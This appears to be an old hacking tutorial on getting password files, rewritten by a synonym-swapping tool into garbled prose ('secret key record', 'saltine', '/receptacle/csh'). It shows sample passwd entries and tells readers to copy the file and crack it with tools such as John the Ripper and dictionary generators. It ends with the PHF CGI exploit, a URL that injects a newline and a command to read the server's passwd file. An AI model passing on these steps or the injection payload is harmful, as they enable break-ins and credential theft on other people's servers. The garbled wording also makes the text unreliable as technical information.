Getting the Password File Through FTP
Alright perhaps the simplest methods of getting superuser access is through
unknown FTP access into a site page. First you need to find out somewhat about
the secret key record...
root:User:d7Bdg:1n2HG2:1127:20:Superuser
TomJones:p5Y(h0tiC:1229:20:Tom Jones,:/usr/individuals/tomjones:/receptacle/csh
BBob:EUyd5XAAtv2dA:1129:20:Billy Bob:/usr/individuals/bbob:/receptacle/csh
This is an illustration of a standard encoded secret key record. The Superuser is
the part that gives you root. That is the fundamental piece of the record.
root:x:0:1:Superuser:/:
ftp:x:202:102:Anonymous ftp:/u1/ftp:
ftpadmin:x:203:102:ftp Administrator:/u1/ftp
This is another illustration of a secret phrase document, just this one has one little
the distinction, it's shadowed. Shadowed secret word records don't allow you to see or
duplicate the genuine encoded secret key. This messes up the secret word
saltine and word reference maker(both clarified later in the content). The following is
another illustration of a shadowed secret key record:
root:x:0:1:0000-Admin(0000):/:/usr/receptacle/csh
daemon:x:1:1:0000-Admin(0000):/:
bin:x:2:2:0000-Admin(0000):/usr/receptacle:
sys:x:3:3:0000-Admin(0000):/:
adm:x:4:4:0000-Admin(0000):/var/adm:
lp:x:71:8:0000-lp(0000):/usr/spool/lp:
smtp:x:0:0:mail daemon client:/:
uucp:x:5:5:0000-uucp(0000):/usr/lib/uucp:
nuucp:x:9:9:0000-uucp(0000):/var/spool/uucppublic:/usr/lib/uucp/uucico
listen:x:37:4:Network Admin:/usr/net/nls:
nobody:x:60001:60001:uid no body:/:
noaccess:x:60002:60002:uid no entrance:/:
webmastr:x:53:53:WWW Admin:/send out/home/webmastr:/usr/canister/csh
pin4geo:x:55:55:PinPaper Admin:/send out/home/webmastr/new/gregY/test/pin4geo:/canister/bogus
ftp:x:54:54:Anonymous FTP:/send out/home/anon_ftp:/canister/bogus
Shadowed secret key documents have an "x" in the spot of a secret key or here and there
they are veiled as a * also.
Since you discover somewhat more about what the genuine secret key document looks
like you ought to have the option to distinguish an ordinary encoded pw from a shadowed
pw record. We would now be able to proceed to discuss how to break it.
Breaking a secret phrase document isn't pretty much as muddled as no doubt, albeit the
documents differ from one framework to another. 1.The initial step that you would take is
to download or duplicate the document. 2. The subsequent advance is to discover a secret word
saltine and a word reference producer. Despite the fact that it's almost difficult to track down a
great saltine there are a couple of alright ones out there. I recomend that you look
for Cracker Jack, John the Ripper, Brute Force Cracker, or Jack the Ripper.
Presently for a word reference producer or a word reference record... At the point when you start a
breaking prog you will be approached to track down the secret phrase document. That is the place where
a word reference creator comes in. You can download one from virtually every programmer
page on the net. A word reference creator tracks down all the conceivable letter
mixes with the letters in order that you choose(ASCII, covers, lowercase, and
numeric letters may likewise be added). We will be delivering our password document
to the public soon, it will be called, Psychotic Candy, "The Perfect Drug."
To this extent,
we realize it will be one of the biggest available for use. 3. You at that point fire up the saltine and follow the headings that it gives
you.
The PHF Technique
Well I didn't know whether I ought to incorporate this part because of the way that
everyone definitely knows it and most workers have effectively gotten some answers concerning
the bug and fixed it. However, since I have been posed inquiries about the phf
I chose to incorporate it.
The pdf method is by a long shot the most straightforward method of getting a secret key record
(in spite of the fact that it doesn't work 95% of the time). Yet, to do the phf everything you do
is open a program and type in the accompanying connection:
http://webpage_goes_here/cgi-canister/phf?Qalias=x%0a/container/cat%20/and so forth/passwd
You supplant the webpage_goes_here with space. So on the off chance that you were attempting to
get the PW document for www.webpage.com you would type:
http://www.webpage.com/cgi-canister/phf?Qalias=x%0a/container/cat%20/and so forth/passwd
furthermore, that is it! You simply pause for a minute or two and duplicate the file(if it works).
0 Comments